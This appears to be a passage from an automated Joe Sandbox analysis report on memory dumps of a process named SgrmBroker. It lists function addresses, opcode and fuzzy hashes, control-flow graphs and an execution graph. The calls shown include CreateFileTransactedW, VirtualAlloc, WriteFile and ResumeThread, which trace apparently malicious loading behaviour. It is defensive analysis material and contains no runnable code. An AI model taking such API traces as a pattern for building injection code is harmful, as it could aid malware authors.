                                      • Instruction Fuzzy Hash: B4912370908A5D8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A980CB04
                                      Function 00007FFD34899FB0 Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1465 7ffd34899fb0-7ffd3489ba68 1470 7ffd3489ba6a-7ffd3489ba81 1465->1470 1471 7ffd3489ba84-7ffd3489bba6 CreateFileTransactedW 1465->1471 1470->1471 1472 7ffd3489bba8 1471->1472 1473 7ffd3489bbae-7ffd3489bc30 1471->1473 1472->1473
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 890b78407db4648a433c9bdfcb4189adae9cf01cf4f1f784e4e26f9d6cda3a1e
                                      • Instruction ID: b891b4149d1ffc9684944ca2b45d0fccbf694fa2ba920a52a2b27f1b9a683ad1
                                      • Opcode Fuzzy Hash: 890b78407db4648a433c9bdfcb4189adae9cf01cf4f1f784e4e26f9d6cda3a1e
                                      • Instruction Fuzzy Hash: 0881D170A08A1C8FDB98DF58C894BA9BBF1FB69311F1051AED04EE3651DB75A980CF44
                                      Function 00007FFD3489BC35 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1476 7ffd3489bc35-7ffd3489bd02 1480 7ffd3489bd2a-7ffd3489bdcd WriteFile 1476->1480 1481 7ffd3489bd04-7ffd3489bd27 1476->1481 1482 7ffd3489bdd5-7ffd3489be31 1480->1482 1483 7ffd3489bdcf 1480->1483 1481->1480 1483->1482
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 32079fe21b36589912d055377c5845eec99f66a5d6bc3e62e105c45a429e01e2
                                      • Instruction ID: bfc48896633a9a77bd5243370ce77ee7d67339f7915f4fc91703595aa07155e6
                                      • Opcode Fuzzy Hash: 32079fe21b36589912d055377c5845eec99f66a5d6bc3e62e105c45a429e01e2
                                      • Instruction Fuzzy Hash: 1E610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40
                                      Function 00007FFD3489D59A Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1485 7ffd3489d59a-7ffd3489d5a3 1486 7ffd3489d5a5-7ffd3489d5cf 1485->1486 1487 7ffd3489d5ed 1485->1487 1488 7ffd3489d5f0-7ffd3489d6c3 GetSystemInfo 1487->1488 1489 7ffd3489d5ef 1487->1489 1494 7ffd3489d6c5 1488->1494 1495 7ffd3489d6cb-7ffd3489d6fb 1488->1495 1489->1488 1494->1495
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 4d30a5af6f4b7abdebb7a7e671cf135e4c33f826bcd5fb4a1c37d5427b371273
                                      • Instruction ID: 028ea489e8a00763256b16fbfe10970be5d202f94e2b6227aea4ce4d4d8cdb32
                                      • Opcode Fuzzy Hash: 4d30a5af6f4b7abdebb7a7e671cf135e4c33f826bcd5fb4a1c37d5427b371273
                                      • Instruction Fuzzy Hash: 5D419F71A08A4C8FDB98EF98D899BEDBBF4FF56314F14416AD00DD7252DA34A846CB40
                                      Function 00007FFD348FF1D7 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1498 7ffd348ff1d7-7ffd348ff1e0 1499 7ffd348ff22a-7ffd348ff2f2 ResumeThread 1498->1499 1500 7ffd348ff1e2-7ffd348ff202 1498->1500 1504 7ffd348ff2fa-7ffd348ff344 1499->1504 1505 7ffd348ff2f4 1499->1505 1505->1504
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 631f9486548b7dc8998ddaf751af7711b673e6706555c20bf32350ea04792142
                                      • Instruction ID: 9980ed3ffecf6d85781cebfdea8ebc911230e22bc3b26eaa0201aebe12c2075a
                                      • Opcode Fuzzy Hash: 631f9486548b7dc8998ddaf751af7711b673e6706555c20bf32350ea04792142
                                      • Instruction Fuzzy Hash: 91412A74E0860C8FDB58EF98D895AEDBBF0FB5A310F10416AD40DE7251DA75A846CF50
                                      Function 00007FFD3489D5D1 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1508 7ffd3489d5d1-7ffd3489d5ed 1510 7ffd3489d5f0-7ffd3489d6c3 GetSystemInfo 1508->1510 1511 7ffd3489d5ef 1508->1511 1515 7ffd3489d6c5 1510->1515 1516 7ffd3489d6cb-7ffd3489d6fb 1510->1516 1511->1510 1515->1516
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 185555fc5114203b971ff8882606ac6c6718e224f980d2345adce8235e06ec1a
                                      • Instruction ID: 0f9a1ebbf04c6b30f887e7240a64ea586d8b4aeedfd6f08f979f3e7e90ab0f75
                                      • Opcode Fuzzy Hash: 185555fc5114203b971ff8882606ac6c6718e224f980d2345adce8235e06ec1a
                                      • Instruction Fuzzy Hash: 64419F7090CA8C8FDB99DFA8D899BE9BBF0EF56310F0441ABD04DD7252CA345846CB40
                                      Function 00007FFD3489DA35 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3081042849.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34890000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 650c9a6e49d1442a0f66505eec74c0549b78a72f4080e1610514138e298308ea
                                      • Instruction ID: 4b37f30cb9913e4d0100964cc9b765c137161126c8406400ab936d32d8c1a87d
                                      • Opcode Fuzzy Hash: 650c9a6e49d1442a0f66505eec74c0549b78a72f4080e1610514138e298308ea
                                      • Instruction Fuzzy Hash: 81512A70918A5C8FDF58EF58C895BE9BBF0FB6A314F1042AAD04DE3251DB70A985CB41
                                      Function 00007FFD34A75E8B Relevance: .9, Instructions: 922COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7805c589c6fea05e416dfe2b7cd48011aacad6215b72202c47be2b7171fc0860
                                      • Instruction ID: c97fb8dba406aa901b15d6ec540da10109365eca5e557c12cb94be1c43487ca0
                                      • Opcode Fuzzy Hash: 7805c589c6fea05e416dfe2b7cd48011aacad6215b72202c47be2b7171fc0860
                                      • Instruction Fuzzy Hash: 40717F71E0DA4D8FEB94DBA898A46BC7FF0FF56315F14007AD109E7292CA79A841DB40
                                      Function 00007FFD34A7640D Relevance: .6, Instructions: 557COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ec95d75061e52c70fff76e5324f74aba643ac4d053eed7b08610551b04be3f9
                                      • Instruction ID: c94aaf3e1ba06810653b6aa1421fe2967dab97dac6e256319d586ee7a6f3cfcf
                                      • Opcode Fuzzy Hash: 3ec95d75061e52c70fff76e5324f74aba643ac4d053eed7b08610551b04be3f9
                                      • Instruction Fuzzy Hash: C312A130A1865D8FDB54EFA8C8A57E9BBF1FF59314F1041BAD40DE3292CA39A945CB40
                                      Function 00007FFD34A76470 Relevance: .5, Instructions: 503COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94d9ff3d8516eaf78ddc92daee0d552babd314b7f2e10e4783ff50d79c220fb1
                                      • Instruction ID: 5b95fa8c3f0e75c6806daf64895f4f1412b982b176e1a83c2efad938ed2e032f
                                      • Opcode Fuzzy Hash: 94d9ff3d8516eaf78ddc92daee0d552babd314b7f2e10e4783ff50d79c220fb1
                                      • Instruction Fuzzy Hash: EEF1A031A1864D8FDB54EFA8C8A57F9BBF1FF59314F1441BAD409E3292CA39A845CB40
                                      Function 00007FFD34A7654E Relevance: .5, Instructions: 498COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cc19783d3380e774bf715f9a64eabe6600f51dd97280a640c333bbe11456eceb
                                      • Instruction ID: a14ef22b5bfa4fb236cd7f53a74b25cce7fe66a993187babfb772eb9b45a92fa
                                      • Opcode Fuzzy Hash: cc19783d3380e774bf715f9a64eabe6600f51dd97280a640c333bbe11456eceb
                                      • Instruction Fuzzy Hash: F6F1A030A1864D8FDB54EFA8C8A57EDBBF1FF59314F14017AD409E3292CA39A941CB40
                                      Function 00007FFD34A764EA Relevance: .5, Instructions: 492COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1596bd858a22e457af7039c07e151be130563a3a8930d25acabb3ad3f360fe89
                                      • Instruction ID: 928e3d167a950b53b9511f37250083351182618bb4ec76463110ab82904256e8
                                      • Opcode Fuzzy Hash: 1596bd858a22e457af7039c07e151be130563a3a8930d25acabb3ad3f360fe89
                                      • Instruction Fuzzy Hash: 72F1AF30A1865D8FDB54EFA8C8A57EDBBF1FF59314F1441BAD409E3292CA39A841CB40
                                      Function 00007FFD34A76678 Relevance: .4, Instructions: 369COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7026dceba525fdcad059770893f72f7918f767222189bea3c73638399f169da
                                      • Instruction ID: 852f62c8ca1290c3ace0c7a0473b91ab49eeb8a355516e91cd297ab60df68c9c
                                      • Opcode Fuzzy Hash: f7026dceba525fdcad059770893f72f7918f767222189bea3c73638399f169da
                                      • Instruction Fuzzy Hash: 7BC17030A1864D8FDB94EFA8C8A57EDBBB1FF59314F50457AD40DE3292CA39A841CB40
                                      Function 00007FFD34A74ED1 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b1daef4185eef3c276c8266ae53a31ed288922e6b81caaa22e10a4381acfe22c
                                      • Instruction ID: 37857545c96e6252299d4ce68e58258607b04c633af7c201a5cab24ddbd6d6db
                                      • Opcode Fuzzy Hash: b1daef4185eef3c276c8266ae53a31ed288922e6b81caaa22e10a4381acfe22c
                                      • Instruction Fuzzy Hash: AFD1C870A08A6D8FDBA4DF58C8A5BE8B7B1FB59305F5041EAD10DE3291CB75A980CF40
                                      Function 00007FFD34A723B5 Relevance: .3, Instructions: 317COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d02b18847f546ce09b450d679350e4961f22211af245fde902106e83e84dde06
                                      • Instruction ID: b6d64e389e095dc69e66f53f75e7ed6d30046e0d09fe8547c16202f3b4e45838
                                      • Opcode Fuzzy Hash: d02b18847f546ce09b450d679350e4961f22211af245fde902106e83e84dde06
                                      • Instruction Fuzzy Hash: F0A1F472E0D6898FEB64DFA89CA56F97FE0FF56308F1440BAD448D7193CA28A905D740
                                      Function 00007FFD34A72400 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction ID: a927284255ccbb48e771bdd0aa74e65ec0aec33451a1d0b80c51e770b521e3e3
                                      • Opcode Fuzzy Hash: aa0f6071ad84a40143402c3e493601951d6ad1fcc725e148b7537140c053c273
                                      • Instruction Fuzzy Hash: 2681C872A4DA894FEBA4DF98DC656B97BF0FF5A304F1440BAD448D7193CA38A941C740
                                      Function 00007FFD34A748DD Relevance: .2, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3086d799dad22f436a0e879923441764cf733c47e376d3290b9b62d7e89efca4
                                      • Instruction ID: c07ac6cbf3dacf99cfa74d6e7d7aa7907e1f7491e700acbcf3665d25b1d1fc62
                                      • Opcode Fuzzy Hash: 3086d799dad22f436a0e879923441764cf733c47e376d3290b9b62d7e89efca4
                                      • Instruction Fuzzy Hash: F861B23191C68D8FDB55DFA8C8A46E97BF0FF1A314F0441BAE458D3192CB78A954C781
                                      Function 00007FFD34A71A05 Relevance: .2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 77c826837c62ed1d5a418ad6c656fb86924611609cd6956fcfc72eb4ed36d2af
                                      • Instruction ID: 6ade9ef2441613737812ec400deecceb85df5a06b5129bf58a4b7bbad2b40b82
                                      • Opcode Fuzzy Hash: 77c826837c62ed1d5a418ad6c656fb86924611609cd6956fcfc72eb4ed36d2af
                                      • Instruction Fuzzy Hash: D661CA34A08A5D8FDF94DF58C894BE97BB1FF69311F108266D40CE3255CB34A885CB80
                                      Function 00007FFD34A70E9A Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c6c4257b353a911220618d0a7659e734030d7d6440a812c67e429b2ac61e6d8
                                      • Instruction ID: 4b45739e26c5a627e2a2f6bdd3b46d2160275601644661c71f8ec4d89ab31bca
                                      • Opcode Fuzzy Hash: 1c6c4257b353a911220618d0a7659e734030d7d6440a812c67e429b2ac61e6d8
                                      • Instruction Fuzzy Hash: F4611C70E085198FEBA4EB58C8D9AA9B7B1FF59305F1041B9D40DE32A1DF38AD819F40
                                      Function 00007FFD34A72995 Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ac05764599311731b35e244821d1eb37763ce5812989fdd93fe5853aff6d817
                                      • Instruction ID: 6bd4cdabae46f5aadf75c3b3c432ef68bc708c7ae04b5fe9a7b9abd9878b7d7a
                                      • Opcode Fuzzy Hash: 9ac05764599311731b35e244821d1eb37763ce5812989fdd93fe5853aff6d817
                                      • Instruction Fuzzy Hash: C9519131A0868D8FDBA5DF54CC91AE97BB0FF5A308F5441FAD44DD7282CA38A945CB81
                                      Function 00007FFD34A74940 Relevance: .2, Instructions: 159COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6beff0d0f64635f3e3d9e972866d03c566875583c9a5a70ec19e7a8f14fcca35
                                      • Instruction ID: 1e606e31c52f90f1f59bffcb7af5bcb2ab6ba56620cfa87ec38ada1a1e8e9c33
                                      • Opcode Fuzzy Hash: 6beff0d0f64635f3e3d9e972866d03c566875583c9a5a70ec19e7a8f14fcca35
                                      • Instruction Fuzzy Hash: 9051D631A1864E8FDB95DF94C8A46FA7BF0FF59304F1441BAE458D3192CB78A554CB80
                                      Function 00007FFD34A70EB9 Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33b1a59964084dcc0f6f1f77a91494b1d90e9b316c6b8635040aa6f23ef6886c
                                      • Instruction ID: 7a2f318d9eb8dd405fae16f1f07552b23a678a0f35daca6008ea39fe9bfea7ac
                                      • Opcode Fuzzy Hash: 33b1a59964084dcc0f6f1f77a91494b1d90e9b316c6b8635040aa6f23ef6886c
                                      • Instruction Fuzzy Hash: 79517570A55A2D8FEBA4EB58C8D9AA9B7B1FF59305F1001A9D40DE3261DF34AD81CF40
                                      Function 00007FFD34A72B15 Relevance: .1, Instructions: 140COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction ID: 8e10d5a9c4de9da5aef3371d367ece0f9b08ad11b46726a7d8fc09b7cfe105db
                                      • Opcode Fuzzy Hash: cb207520b047d153eaa3517c762fddd9a6256cbceb8f20284ab2668b594eb493
                                      • Instruction Fuzzy Hash: EC41B231A1DA5D8FDB91DBA8D8A56E97BF0FF5A310F0400BAD508E3192CA285841C790
                                      Function 00007FFD34A75203 Relevance: .1, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ebfc21c350447d4ddab1b92ca9542464cc419b5603e0cfbbb51a491e6033003a
                                      • Instruction ID: 20d7921aa01ff0922b96f4e8ee0b912608ff4ac3c6f8cb64a8deda297e4e2951
                                      • Opcode Fuzzy Hash: ebfc21c350447d4ddab1b92ca9542464cc419b5603e0cfbbb51a491e6033003a
                                      • Instruction Fuzzy Hash: C0519F30A1892D8FDBA4EB58C895BE8B7B1FB69305F5044E9910DE3291CB74AEC0CF40
                                      Function 00007FFD34A76A5D Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 433f06b1b32c4547d614a0d04f656300c5fbbd545aaf425308e901399d7016a0
                                      • Instruction ID: bd0a8eaa4a1f9d84aac810d730ae7a3ca7ae5061b58a491d938bb88c63b88c2c
                                      • Opcode Fuzzy Hash: 433f06b1b32c4547d614a0d04f656300c5fbbd545aaf425308e901399d7016a0
                                      • Instruction Fuzzy Hash: 7E416A30E5864D8FEB61EBA8D8A57EDBBF1EF4A315F544076D10CE3192CA3868819B41
                                      Function 00007FFD34A771E1 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction ID: ab6b9d9411bede55ed861fd315a2a6c12c394fdf0f469b31573e9d15f1f1c14c
                                      • Opcode Fuzzy Hash: 8261c4a2f750e428e2f930d2c007754a524de46709e3be59b675f7b049120cf2
                                      • Instruction Fuzzy Hash: 9E31CF34E09A4D8FDB51EBA8C8506EDBFF0FF1A315F0401B6E158E7292DA38A945CB50
                                      Function 00007FFD34A74AD5 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52240373fb5c8cc08a4f1ae22f09876df31d749a5010ef138fc691cb29cd0241
                                      • Instruction ID: eabe1d0f0dcfed359c502db32d44855be9e9667953e733c234baa19ad8d5e565
                                      • Opcode Fuzzy Hash: 52240373fb5c8cc08a4f1ae22f09876df31d749a5010ef138fc691cb29cd0241
                                      • Instruction Fuzzy Hash: 48211731A18A4D9FDF90EF98D895AEDBBF1FF69315F144166E508E3251CB34A8508B80
                                      Function 00007FFD34A71C2D Relevance: .0, Instructions: 27COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3082510787.00007FFD34A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A70000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34a70000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6d589180f7032af1d10962e9018f6578b2eda686b08f4cfbe134ca9cbcf7ad62
                                      • Instruction ID: 7a7bb7b689452b94ad07a1e9bcc4dbcda818e2685e946cffc46222890c568e66
                                      • Opcode Fuzzy Hash: 6d589180f7032af1d10962e9018f6578b2eda686b08f4cfbe134ca9cbcf7ad62
                                      • Instruction Fuzzy Hash: 05F0E235D5C24D4FE761EBA488A92E8BFE0FF06304F9544FAD908D2082DA395504C741

                                      Execution Graph

                                      Execution Coverage:14.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:46
                                      Total number of Limit Nodes:2
                                      execution_graph 11351 7ffd348ffe3c 11352 7ffd348ffeba 11351->11352 11353 7ffd348ffe1a 11351->11353 11356 7ffd348ffeaf 11353->11356 11355 7ffd348ffea5 11357 7ffd348ffeba 11356->11357 11358 7ffd348fff02 11356->11358 11357->11355 11361 7ffd348ff110 11358->11361 11360 7ffd34900009 11360->11355 11363 7ffd348ff11b 11361->11363 11362 7ffd348ff1be 11362->11360 11363->11362 11365 7ffd348ff1d7 11363->11365 11366 7ffd348ff22a ResumeThread 11365->11366 11367 7ffd348ff1e2 11365->11367 11369 7ffd348ff2f4 11366->11369 11367->11362 11369->11362 11370 7ffd3489da35 11371 7ffd3489daa1 VirtualAlloc 11370->11371 11373 7ffd3489db7f 11371->11373 11374 7ffd3489bc35 11376 7ffd3489bc5f WriteFile 11374->11376 11377 7ffd3489bdcf 11376->11377 11339 7ffd3489a397 11340 7ffd3489a39c 11339->11340 11343 7ffd34899fb0 11340->11343 11342 7ffd3489a400 11344 7ffd34899fb9 CreateFileTransactedW 11343->11344 11346 7ffd3489bba8 11344->11346 11346->11342 11395 7ffd348ff349 11396 7ffd348ff357 CloseHandle 11395->11396 11398 7ffd348ff434 11396->11398 11347 7ffd348ff205 11348 7ffd348ff21f ResumeThread 11347->11348 11350 7ffd348ff2f4 11348->11350 11378 7ffd3489d5d1 11379 7ffd3489d5ed GetSystemInfo 11378->11379 11381 7ffd3489d6c5 11379->11381 11382 7ffd3489d154 11383 7ffd3489d15a 11382->11383 11386 7ffd3489d59a 11383->11386 11385 7ffd3489d160 11387 7ffd3489d5a5 11386->11387 11388 7ffd3489d5ed GetSystemInfo 11386->11388 11387->11385 11390 7ffd3489d6c5 11388->11390 11390->11385 11391 7ffd348ffc4d 11392 7ffd348ffca2 GetFileAttributesW 11391->11392 11394 7ffd348ffd35 11392->11394

                                      Executed Functions

                                      Function 00007FFD348A2961 Relevance: 2.2, Instructions: 2175COMMON
